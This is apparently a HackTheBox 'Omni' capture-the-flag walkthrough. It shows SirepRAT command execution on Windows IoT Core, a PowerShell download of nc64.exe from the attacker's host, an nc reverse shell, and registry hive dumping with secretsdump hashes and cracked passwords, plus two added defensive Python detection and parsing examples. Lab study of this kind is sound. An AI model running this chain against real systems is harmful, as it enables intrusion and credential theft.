OMNI HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:18 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.10.204 [4 ports]
Completed Ping Scan at 10:18, 0.52s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:18
Scanning omni.htb (10.10.10.204) [1000 ports]
Discovered open port 135/tcp on 10.10.10.204
Discovered open port 8080/tcp on 10.10.10.204
Completed SYN Stealth Scan at 10:18, 29.60s elapsed (1000 total ports)
Initiating Service scan at 10:18
Scanning 2 services on omni.htb (10.10.10.204)
Completed Service scan at 10:18, 8.70s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against omni.htb (10.10.10.204)
Retrying OS detection (try #2) against omni.htb (10.10.10.204)
Initiating Traceroute at 10:19
Completed Traceroute at 10:19, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:19
Completed Parallel DNS resolution of 2 hosts. at 10:19, 0.32s elapsed
NSE: Script scanning 10.10.10.204.
Initiating NSE at 10:19
Completed NSE at 10:19, 8.33s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 1.43s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Nmap scan report for omni.htb (10.10.10.204)
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   410.29 ms 10.10.14.1
2   412.53 ms omni.htb (10.10.10.204)

NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.23 seconds
           Raw packets sent: 2100 (96.092KB) | Rcvd: 1023 (593.916KB)

ENUMERATION

First we need to work out which OS this device runs and what kind of device it is.

Googling "omni" suggests it is some kind of router-like device running Windows IoT Core.

Now we need to find an exploit for that, but first let's check both open ports.

PORT 8080

The Windows Device Portal on this port asks for a password (HTTP Basic auth, as the nmap output shows), so let's move on for now.

PORT 135

Here we get a connection timeout:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rpcclient -U " " 10.10.10.204
Enter TESTING\ 's password: 
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

So let's Google for that.

Searching for Windows IoT Core exploitation, the first hit is a GitHub project named SirepRAT – RCE as SYSTEM on Windows IoT Core. Note that SirepRAT does not use either of the two ports nmap found; it talks to the separate Sirep test service, which the default top-1000 port scan does not cover, so a full-range scan (-p-) is worth running against devices like this.

https://github.com/SafeBreach-Labs/SirepRAT

Clone it to your machine.

Looking through the commands in its README, these two are the ones we will need:

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

First, let's try the basic command:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

The only thing we get back is the payload peek 'omni', so let's run it again with the verbose flag (--v) to print the output stream:

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v
---------
omni

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

Now we get the full output.

Let's try something new with this command:

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}" --v
---------
C:\Data\Users\System

---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

So the pattern is: --cmd takes an executable to launch and --args the arguments to pass to it. Going through cmd.exe /c works for simple commands, but not for everything we want to run.

So let's fix that by going through powershell.exe instead:

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v

Now let's get a reverse shell so we can explore this machine further.

STEPS WE ARE GOING TO FOLLOW NOW

Transfer a 64-bit nc to the Omni machine

Then execute it to get a reverse shell back to our machine

TRANSFER THE NC.EXE

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

Executing NC.EXE through cmd.exe

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe" --v
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

GETTING REVERSE SHELL

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>

Looking around, we find both user.txt and root.txt, but they are XML files holding PowerShell credential objects (the Export-Clixml format), not plain flags. To decrypt them we need to be the particular user who created each one, so to get access as that user we dump the SAM, SECURITY and SYSTEM registry hives and extract the password hashes.

LINK TO HELP YOU:

https://pure.security/dumping-windows-credentials/

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>reg.exe save hklm\sam sam.save
reg.exe save hklm\sam sam.save
The operation completed successfully.

C:\windows\system32>reg.exe save hklm\security security.save
reg.exe save hklm\security security.save
The operation completed successfully.

C:\windows\system32> reg.exe save hklm\system system.save
 reg.exe save hklm\system system.save
The operation completed successfully.
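
Every step of the chain so far (PowerShell fetching nc64.exe, nc64.exe handing a shell to a remote host, reg.exe saving the three hives) leaves a distinct process-creation record. The script below is an added example, not part of the original writeup or of SirepRAT: it runs a few detection rules over constructed events modelled on the commands above. The event fields mimic a Sysmon Event ID 1 / Security 4688 record, and the parent images are stand-ins (the real parent of a Sirep-launched process is not shown on this page).

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    """The process-creation fields (Sysmon EID 1 / Security 4688) the rules need."""
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


# reg.exe writing a credential hive (SAM, SECURITY or SYSTEM) to a file
HIVE_RE = re.compile(r"\bsave\s+hklm\\(sam|security|system)\b", re.I)
# PowerShell downloading something and writing an .exe to disk
DOWNLOAD_RE = re.compile(r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring)", re.I)
OUTFILE_EXE_RE = re.compile(r"-outfile\s+\S+\.exe\b", re.I)
# a netcat-style binary told to hand a shell to host:port with -e
NC_SHELL_RE = re.compile(
    r"\b(nc|nc64|ncat)(\.exe)?\s+\S+\s+\d{1,5}\s+-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe"}
SHELL_NAMES = {"cmd.exe", "powershell.exe"}


def rule_hive_save(e: ProcEvent) -> bool:
    return basename(e.image) == "reg.exe" and bool(HIVE_RE.search(e.command_line))


def rule_exe_download(e: ProcEvent) -> bool:
    return (basename(e.image) == "powershell.exe"
            and bool(DOWNLOAD_RE.search(e.command_line))
            and bool(OUTFILE_EXE_RE.search(e.command_line)))


def rule_nc_reverse_shell(e: ProcEvent) -> bool:
    return bool(NC_SHELL_RE.search(e.command_line))


def rule_shell_from_netcat(e: ProcEvent) -> bool:
    # the cmd.exe that nc -e spawns has the netcat binary as its parent
    return basename(e.image) in SHELL_NAMES and basename(e.parent_image) in NETCAT_NAMES


RULES = {
    "hive_save": rule_hive_save,
    "exe_download": rule_exe_download,
    "nc_reverse_shell": rule_nc_reverse_shell,
    "shell_from_netcat": rule_shell_from_netcat,
}

# Constructed sample events modelled on the commands in this writeup.
SVCHOST = r"C:\Windows\System32\svchost.exe"   # stand-in parent, not the real one
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NC = r"C:\Data\Users\app\nc64.exe"
SAMPLE_EVENTS = [
    ProcEvent(PS, r"powershell.exe /c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe "
                  r"-OutFile C:\Data\Users\app\nc64.exe", SVCHOST),
    ProcEvent(CMD, r"cmd.exe /c C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe", SVCHOST),
    ProcEvent(NC, r"C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe", CMD),
    ProcEvent(CMD, "cmd.exe", NC),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"reg.exe save hklm\sam sam.save", CMD),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"reg.exe save hklm\security security.save", CMD),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"reg.exe save hklm\system system.save", CMD),
    # benign activity that must stay quiet
    ProcEvent(r"C:\Windows\System32\reg.exe", r"reg.exe query hklm\software\microsoft", CMD),
    ProcEvent(PS, "powershell.exe -Command Get-Process", r"C:\Windows\explorer.exe"),
]


def evaluate(events):
    """Return one (rule name, image basename) pair per rule each event trips."""
    return [(name, basename(e.image)) for e in events for name, pred in RULES.items() if pred(e)]


def summarize(events):
    """Count hits per rule; an empty dict means the batch looked clean."""
    counts = {}
    for name, _ in evaluate(events):
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for name, image in evaluate(SAMPLE_EVENTS):
        print(f"ALERT {name:<18} {image}")
```

The hive-save rule is the high-confidence one: there is almost no legitimate reason for reg.exe to write hklm\sam or hklm\security to a file, and the same command line appears whether the attacker came in over Sirep, the Device Portal or anything else.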

Now let's extract the hashes from the saved hives with Impacket's secretsdump.py:

┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM 
 0000   14 07 22 73 99 42 B0 ED  F5 11 9A 60 FD A1 10 EF   .."s.B.....`....
 0010   DF 19 3C 6C 22 F2 92 0C  34 B1 6D 78 CC A7 0D 14   ..<l"...4.mx....
 0020   02 7B 81 04 1E F6 1C 66  69 75 69 84 A7 31 53 26   .{.....fiui..1S&
 0030   A3 6B A9 C9 BF 18 A8 EF  10 36 DB C2 CC 27 73 3D   .k.......6...'s=
NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up... 

Now we have the NT hashes. They cannot be decrypted (an NT hash is unsalted MD4 of the UTF-16LE password), so we crack them instead.

That gives us the password for the app user:

app : mesh5143

GETTING USER ACCESS

We cannot log in with it through evil-winrm, but we can try it on the Windows Device Portal login page on port 8080.

After logging in there is an option to run a command, which is effectively a shell already.

So we use the netcat binary we uploaded earlier to get a proper reverse shell.

Here we go: with a shell as the user app we can now decrypt those files, because the SecureString inside them was protected with DPAPI under app's account and is only readable from that account.

LINKS TO HELP YOU IN DECRYPTING FILES:

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7

https://www.red-gate.com/simple-talk/sysadmin/powershell/portable-objects-in-powershell-with-clixml/

https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49676
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd c:\DATA\Users\App
PS C:\DATA\Users\app> ls
ls


    Directory: C:\DATA\Users\app


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         7/4/2020   7:28 PM                3D Objects                    
d-r---         7/4/2020   7:28 PM                Documents                     
d-r---         7/4/2020   7:28 PM                Downloads                     
d-----         7/4/2020   7:28 PM                Favorites                     
d-r---         7/4/2020   7:28 PM                Music                         
d-r---         7/4/2020   7:28 PM                Pictures                      
d-r---         7/4/2020   7:28 PM                Videos                        
-ar---         7/4/2020   8:20 PM            344 hardening.txt                 
-ar---         7/4/2020   8:14 PM           1858 iot-admin.xml                 
-a----        8/24/2020   4:38 AM          45272 nc64.exe                      
-ar---         7/4/2020   9:53 PM           1958 user.txt                      

PS C:\DATA\Users\app> 

PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\user.txt
$cli = Import-Clixml C:\DATA\Users\app\user.txt
PS C:\DATA\Users\app> $cli | Get-Member 
$cli | Get-Member 


   TypeName: System.Management.Automation.PSCredential

Name                 MemberType Definition                                     
----                 ---------- ----------                                     
Equals               Method     bool Equals(System.Object obj)                 
GetHashCode          Method     int GetHashCode()                              
GetNetworkCredential Method     System.Net.NetworkCredential GetNetworkCrede...
GetObjectData        Method     void GetObjectData(Microsoft.PowerShell.Core...
GetType              Method     type GetType()                                 
ToString             Method     string ToString()                              
Password             Property   securestring Password {get;}                   
UserName             Property   string UserName {get;}                         


PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70

HERE WE GO WITH THE USER FLAG
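
What Import-Clixml just read back is a serialised PSCredential: Export-Clixml writes the UserName in clear and the Password as a hex DPAPI blob protected under the exporting user, which is why user.txt and iot-admin.xml could only be opened from app's own session. The parser below is an added example, not code from the writeup; it finds PSCredential objects in CliXML text and reports the username and whether the blob carries a DPAPI header, without attempting any decryption. The sample document is constructed in the shape Export-Clixml produces, with placeholder bytes after a valid DPAPI header.

```python
import xml.etree.ElementTree as ET

NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCRED = "System.Management.Automation.PSCredential"
# DPAPI blob header: version 1 followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian field order.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def _tag(name: str) -> str:
    return f"{{{NS}}}{name}"


def find_credentials(xml_text: str):
    """Return one record per PSCredential object in a CliXML document."""
    root = ET.fromstring(xml_text)
    type_table = {}          # TN RefId -> type names, for later <TNRef/> objects
    found = []
    for obj in root.iter(_tag("Obj")):
        tn = obj.find(_tag("TN"))
        if tn is not None:
            types = [t.text for t in tn.findall(_tag("T"))]
            type_table[tn.get("RefId")] = types
        else:
            ref = obj.find(_tag("TNRef"))
            types = type_table.get(ref.get("RefId"), []) if ref is not None else []
        if PSCRED not in types:
            continue
        props = {p.get("N"): p for p in obj.findall(_tag("Props") + "/*")}
        user = props["UserName"].text if "UserName" in props else None
        ss = props.get("Password")
        blob = bytes.fromhex(ss.text.strip()) if ss is not None and ss.text else b""
        found.append({
            "username": user,
            "secure_string_len": len(blob),
            # True means only the protecting user (CurrentUser DPAPI scope) can unwrap it
            "dpapi_protected": blob.startswith(DPAPI_MAGIC),
        })
    return found


# Constructed CliXML document: two PSCredential objects (the second typed via
# TNRef, as CliXML does for repeated types) and one unrelated Hashtable.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{NS}">
  <Obj RefId="0">
    <TN RefId="0"><T>{PSCRED}</T><T>System.Object</T></TN>
    <ToString>{PSCRED}</ToString>
    <Props>
      <S N="UserName">omni\\app</S>
      <SS N="Password">{(DPAPI_MAGIC + bytes(range(32))).hex()}</SS>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TNRef RefId="0" />
    <ToString>{PSCRED}</ToString>
    <Props>
      <S N="UserName">omni\\administrator</S>
      <SS N="Password">{(DPAPI_MAGIC + bytes(range(32, 64))).hex()}</SS>
    </Props>
  </Obj>
  <Obj RefId="2">
    <TN RefId="1"><T>System.Collections.Hashtable</T><T>System.Object</T></TN>
    <DCT><En><S N="Key">note</S><S N="Value">not a credential</S></En></DCT>
  </Obj>
</Objs>
"""

if __name__ == "__main__":
    for cred in find_credentials(SAMPLE_CLIXML):
        print(cred)
```

Run over a user profile, this is a quick way to inventory stored PowerShell credentials (the same shape as user.txt and iot-admin.xml here); the DPAPI header also explains the failure mode a defender cares about: anyone who can run code as that user, by any route, can call GetNetworkCredential() on the object.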

NOW WE HAVE ONE MORE XML FILE IN THE SAME FORMAT, SO LET'S DECRYPT THAT TOO

PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml
$cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml
PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
_1nt3rn37ofTh1nGz
PS C:\DATA\Users\app> 

This gives us another password. Trying it as administrator on evil-winrm does not work, but it does on the Device Portal login page:

administrator : _1nt3rn37ofTh1nGz

So let's get a shell as administrator and decrypt the root flag.

Note that if we try to ls the Administrator directory from the app shell, we are denied due to low privileges.

GETTING ROOT ACCESS

Just follow the same steps to get a reverse shell from the web page to our terminal.

There you get a shell as administrator:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49677
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> cd C:\DATA\Users
cd C:\DATA\Users
PS C:\DATA\Users> cd Administrator
cd Administrator
PS C:\DATA\Users\Administrator> ls
ls


    Directory: C:\DATA\Users\Administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---         7/3/2020  11:23 PM                3D Objects                    
d-r---         7/3/2020  11:23 PM                Documents                     
d-r---         7/3/2020  11:23 PM                Downloads                     
d-----         7/3/2020  11:23 PM                Favorites                     
d-r---         7/3/2020  11:23 PM                Music                         
d-r---         7/3/2020  11:23 PM                Pictures                      
d-r---         7/3/2020  11:23 PM                Videos                        
-ar---         7/4/2020   9:48 PM           1958 root.txt                      


PS C:\DATA\Users\Administrator> $cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
$cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
PS C:\DATA\Users\Administrator> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\DATA\Users\Administrator> 

Here we go with our root flag

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
